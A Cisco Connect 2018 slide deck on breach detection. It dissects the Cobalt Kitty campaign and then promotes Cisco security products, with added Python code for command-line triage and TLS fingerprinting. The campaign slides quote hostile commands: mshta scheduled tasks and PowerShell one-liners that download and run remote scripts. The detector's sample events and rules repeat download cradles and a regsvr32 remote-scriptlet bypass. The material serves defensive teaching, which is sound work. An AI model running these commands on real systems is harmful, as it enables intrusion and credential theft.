Breach Detection and Mitigation Practical Examples

Dragan Novakovic Consulting Systems Engineer

Challenges Today

• Many discrete security products
• Information overload
• High cost of attacker attribution
• Inefficient breach mitigation process

19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia

Advanced Adversary

• A step below government-sponsored attackers but much more widespread

• Individuals or organized groups, not governments

• Going after a smaller number of targets, but capable of steering infections individually
• Higher profits per target

• Going after $$ - intellectual property, access and user data

Attack Commonalities

• Sandboxing & analysis evasion
• Misuse of legitimate resources
• Low forensic footprint
• Layers of scripting
• Steganography
• Stable C&C

From The Trenches: Cobalt Kitty Campaign

§ Well documented campaign
§ Revealing latest attack techniques & tactics
§ Resulted in compromise of a domain admin account and a severe data breach

Attack lifecycle: Delivery → Exploitation → Installation → Persistence → Lateral Movement → Exfiltration

Source: https://www2.cybereason.com/asset/60:research-cobalt-kitty-attack-lifecycle

From The Trenches: Cobalt Kitty Campaign – Delivery

Spear-phishing
– Email containing links to a fake Flash update
– Users likely to grant admin rights
– Downloads and executes Cobalt Strike Beacon (post-exploitation tool)

Microsoft Office Word document with macros
– Macro creates simple scheduled tasks using cmd.exe
– Windows AppLocker script-blocking policy bypass using .exe (Metasploit: exploit/windows/misc/regsvr32_applocker_bypass_server)
– Runs PowerShell through rundll32 to bypass software restrictions (https://github.com/p3nt4/PowerShdll)

From The Trenches: Cobalt Kitty Campaign – Exploitation

Scheduled Task Creation

schtasks /create /sc MINUTE /tn "" /tr "mshta.exe about:''" /mo 15 /F

Microsoft HTML Application (HTA) – VBScript execution

Set objShell = CreateObject("Wscript.Shell")
intReturn = objShell.Run(" -execute bypass -com"" IEX ((new-object net.webclient).downloadstring('hxxp://xx/image.jpg')))

The VBScript runs a CMD command, which in turn executes the PowerShell script.

→ Cobalt Strike Beacon

From The Trenches: Cobalt Kitty Campaign – Persistence

Persistence Mechanisms
– Windows Scheduled Tasks
– Windows Services
– Autorun keys

DLL Hijacking
– Using legitimate software to execute a trojanized DLL
– Abuses a DLL not being present by default, or the search order in which it is loaded
– Google Update loading goopdate.dll
– Windows Search loading msfte.dll

From The Trenches: Cobalt Kitty Campaign – Lateral Movement

File-less Credential and Hash Stealing
– Modified version of Mimikatz (file-less)
– Modified version of a password file dumper

Lateral Movement
– Pass-the-hash and pass-the-ticket attacks
– Use of Windows Management Instrumentation (WMI) for remote execution

From The Trenches: Cobalt Kitty Campaign – Lateral Movement

File-less Scanning Using PowerUp
– Scanning for open ports, vulnerable services and OS fingerprinting using an externally hosted PowerShell script loaded into memory (file-less download via PowerShell Invoke-Expression, then the PowerUp method):

Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks"

https://blogs.technet.microsoft.com/heyscriptingguy/2014/03/19/creating-a-port-scanner-with-windows-powershell/ https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
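As an added illustration (not part of the deck or of the Cybereason report), the following Python triages constructed process-creation events against the living-off-the-land patterns the preceding Cobalt Kitty slides describe: schtasks spawning mshta, the about: HTA, the PowerShell download cradle with execution-policy bypass, PowerShdll hosted by rundll32 and the regsvr32 scriptlet bypass. The event fields, rule names, weights and sample command lines are assumptions for the example.

```python
import re

# Constructed sample process-creation events (not from the deck); each is the
# minimal parent / image / command-line triple an endpoint sensor would record.
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c schtasks /create /sc MINUTE /tn "Updater" /tr "mshta.exe about:blank" /mo 15 /F'},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -exec bypass -c \"IEX ((new-object net.webclient).downloadstring('http://example.invalid/image.jpg'))\""},
    {"parent": "cmd.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe PowerShdll.dll,main -w"},
    {"parent": "cmd.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/file.sct scrobj.dll"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
]

# Rule name, regex over the command line, and the campaign stage it maps to (assumed weights below).
RULES = [
    ("schtasks_mshta", r"schtasks\b.*/create\b.*mshta", "persistence: scheduled task launching mshta"),
    ("mshta_about", r"mshta(\.exe)?\s+about:", "exploitation: HTA with inline about: script"),
    ("ps_download_cradle", r"(downloadstring|downloadfile)\s*\(", "delivery: PowerShell download cradle"),
    ("ps_exec_bypass", r"-(executionpolicy|exec|ex)\s+bypass", "evasion: execution policy bypass"),
    ("rundll32_powershdll", r"rundll32(\.exe)?\s+PowerShdll\.dll", "evasion: PowerShell hosted by rundll32"),
    ("regsvr32_scriptlet", r"regsvr32(\.exe)?.*/i:https?://.*scrobj\.dll", "evasion: regsvr32 AppLocker bypass"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

def triage_event(event):
    """Score one event: +2 per matching rule, +3 if an Office process spawned a script host."""
    score, reasons = 0, []
    for name, pattern, stage in RULES:
        if re.search(pattern, event["cmdline"], re.I):
            score += 2
            reasons.append(f"{name}: {stage}")
    if event["parent"].lower() in OFFICE_PARENTS and event["image"].lower() in SCRIPT_HOSTS:
        score += 3
        reasons.append("office_spawn: Office process spawned a script host")
    return score, reasons

def triage(events):
    """Return (index, score, reasons) for every suspicious event, highest score first."""
    ranked = [(i, *triage_event(e)) for i, e in enumerate(events)]
    return sorted((r for r in ranked if r[1] > 0), key=lambda r: -r[1])

if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx} score {score}: " + "; ".join(reasons))
```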

From The Trenches: Cobalt Kitty Campaign – Exfiltration

C&C and Exfiltration
– NetCat, DNS tunnelling & Cobalt Strike Malleable C2
– Outlook scripts send the exfiltrated data via email to a Gmail address

"The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him"

Sun Tzu, The Art of War

Image: Warriors, China, Old Xian Statue, Museum (1445587), http://maxpixel.freegreatpicture.com/Museum

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public

1. Hinder In-Advance Attack Preparation

1. Hinder In-Advance Attack Preparation
✓ Cognitive Threat Analytics
– Internal state
– Passive
– No feeds

1. Hinder In-Advance Attack Preparation
✓ StealthWatch
– Passive
– Lateral movement
– Baselining

2. Deploy Generic C&C Detectors
✓ Umbrella Investigate
– Predictive algorithms
– Automatic takedown
– Co-occurrences

2. Deploy Generic C&C Detectors
✓ Cognitive Threat Analytics
– Uncover the entire infrastructure
– Behavior and context
– Including low-and-slow and steganography-based channels

2. Deploy Generic C&C Detectors
✓ Encrypted Traffic Analytics (StealthWatch)
Detects malicious traffic without decryption by analyzing:
– Initial data packet
– Hostname
– Certificate information
– Supported cipher suites
– Packet size/timing in TLS-based connections
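As an added example, not code from the deck or from Cisco, the Python below builds a constructed TLS ClientHello, parses the two initial-data-packet fields the slide lists that are visible without decryption (the SNI hostname and the offered cipher suites), and flags a missing SNI or legacy RC4 suites. The cipher-suite numbers are standard IANA values; the flagging criteria are assumptions chosen for illustration.

```python
import struct

# TLS_RSA_WITH_RC4_128_MD5 / TLS_RSA_WITH_RC4_128_SHA (IANA values): legacy suites
# that current browsers no longer offer, so their presence is a fingerprint worth noting.
RC4_SUITES = {0x0004, 0x0005}

def build_client_hello(suites, sni=None):
    """Construct a minimal TLS 1.2 ClientHello record (test input, not captured traffic)."""
    exts = b""
    if sni is not None:
        host = sni.encode()
        name_list = b"\x00" + struct.pack("!H", len(host)) + host           # name type 0 = host_name
        sni_data = struct.pack("!H", len(name_list)) + name_list
        exts = struct.pack("!HH", 0x0000, len(sni_data)) + sni_data         # extension type 0 = SNI
    body = (b"\x03\x03" + b"\x11" * 32 + b"\x00"                             # version, random, empty session id
            + struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
            + b"\x01\x00"                                                    # one compression method: null
            + struct.pack("!H", len(exts)) + exts)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body                # handshake type 1 = ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake  # record type 22 = handshake

def parse_client_hello(rec):
    """Extract the SNI hostname and offered cipher suites from a raw ClientHello record."""
    if rec[0] != 0x16 or rec[5] != 0x01:
        raise ValueError("not a TLS ClientHello record")
    p = 5 + 4 + 2 + 32                                   # record hdr, handshake hdr, version, random
    p += 1 + rec[p]                                      # session id
    n = struct.unpack_from("!H", rec, p)[0]; p += 2
    suites = [struct.unpack_from("!H", rec, p + i)[0] for i in range(0, n, 2)]; p += n
    p += 1 + rec[p]                                      # compression methods
    sni = None
    if p + 2 <= len(rec):
        end = p + 2 + struct.unpack_from("!H", rec, p)[0]; p += 2
        while p + 4 <= end:
            etype, elen = struct.unpack_from("!HH", rec, p); p += 4
            if etype == 0x0000:
                hlen = struct.unpack_from("!H", rec, p + 3)[0]             # skip list len(2) + name type(1)
                sni = rec[p + 5:p + 5 + hlen].decode()
            p += elen
    return {"sni": sni, "suites": suites}

def flag_client_hello(rec):
    """Reasons this ClientHello deserves analyst attention (empty list = nothing notable)."""
    info = parse_client_hello(rec)
    reasons = []
    if info["sni"] is None:
        reasons.append("no SNI: browsers send one, hand-rolled C2 clients often do not")
    if RC4_SUITES & set(info["suites"]):
        reasons.append("offers RC4 suites: legacy fingerprint, unusual for a current browser")
    return reasons
```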

3. Stream Endpoint and Network Level Traces

Because:
• Coding errors happen
• Mistakes happen
• Detection due to definition updates happens (later)

Do:
§ Collect and have at hand endpoint and network activity logs

3. Stream Endpoint and Network Level Traces
✓ AMP for Endpoints
– Collects traces
– Retrospection
– Root cause analysis
– Exploit Prevention
– Heuristic Detection

3. Stream Endpoint and Network Level Traces
✓ StealthWatch
– NetFlow for security

3. Stream Endpoint and Network Level Traces
✓ Threat Grid
– Global database
– Indicators of compromise
– Pivoting and context

4. Use Vendor with Large Threat Research Team
✓ TALOS

Infographic: Talos threat intelligence sources
– Millions of telemetry agents; 1.5 million daily malware samples; 600 billion daily email messages; 16 billion daily web requests; 20 billion threats blocked
– 250+ full-time threat intel researchers; 1100+ threat traps; 100+ threat intelligence partners; 500+ participants in open source communities
– Threat intel: internet-wide scanning, honeypots, product telemetry, vulnerability discovery (internal), open source communities, 3rd-party programs (MAPP)
– Intel sharing: service provider coordination program, customer data sharing programs, industry sharing partnerships (ISACs), open source intel sharing

4. Use Vendor with Large Threat Research Team
✓ TALOS

4. Use Vendor with Large Threat Research Team

5. Deploy Full Detector Stack

Diagram: detector stack, from simple to complex (more detectors → catches more complex malware, but bugs, cost & risk increase)
– FW/NGFW, Reputation/Rules, Policy/Patches
– NGIPS, Antivirus, Content Filtering
– Sandboxing, Anomaly, Machine Learning

Everything is Configured…Now what?

Breach Detection and Mitigation - Practically!

Breach Detection
– Detecting a breach, from C&C to a file
– Establishing priority rating
– Analyzing the root cause
– Reviewing related network activity

Immediate Reaction
– Following traces on the endpoint
– Estimating spread on the endpoint and in the network

Final Reaction
– Finding additional malicious activity on the endpoint
– Reimaging the affected endpoints
– Updating policies to prevent reinfection

Breach Detection and Mitigation Process

• CTA detects C2 channel (or Umbrella or Investigate or IoC or Talos)

• TG provides global and local file behavior context (endpoint level details)

• AMP identifies files responsible for C&C activity and provides endpoint visibility

• AMP quarantines malicious executables and blocks their further reintroduction

• ISE quarantines the endpoint

• AMP is used for root cause analysis before endpoint is re-imaged

All steps need to be done within hours to prevent data leaks!

Notification About a Breach

Daily reports in CTA, weekly reports in AMP: Too Slow!

Notification About a Breach - Better!
§ Subscribe to email alerts
§ Use SIEM for more granular control

Establishing Priority Rating
AMP and Threat Grid threat prioritization

Establishing Priority Rating
CTA threat prioritization

Critical Risk – Data damage: Quarantine, Reimage
High Risk – Bad infection: Reimage
Medium Risk – Light infection: Try clean; if failed, reimage
Low Risk – Network only: Try clean; if failed, monitor

Establishing Priority Rating

Demo: AMP Event Correlation

Step 1: Breach Detection

Demo: Breach Detection

Step 2: Immediate Reaction

Demo: Immediate Reaction

Automatic response with ISE
Diagram labels: CTA, Incident, STIX/TAXII, ISE, Quarantine, Device, Logs, HTTP(S)

Block Everywhere - AMP Unity

Diagram: AMP Cloud (Device Trajectory, customer-specific whitelists and blacklists) shared across Endpoints, Network Appliances (NGIPS, NGFW) and Content Appliances (WSA, ESA), with WWW traffic in between

Step 3: Final Reaction

Demo: Final Reaction

Complex Malware Revealed

Malware injection path → PowerShell privilege escalation → Browser extension installation → Stealing browser credentials

Would be prevented by ISE quarantine

Browser Exfiltration Module Revealed

C:/Users/Student1/AppData/Roaming/Mozilla/Firefox/Profiles/…/chrome/content/overlay.js

Technologies Used

• AMP for Endpoints
• Cognitive Threat Analytics
• Threat Grid
• StealthWatch
• AMP Visibility
• ISE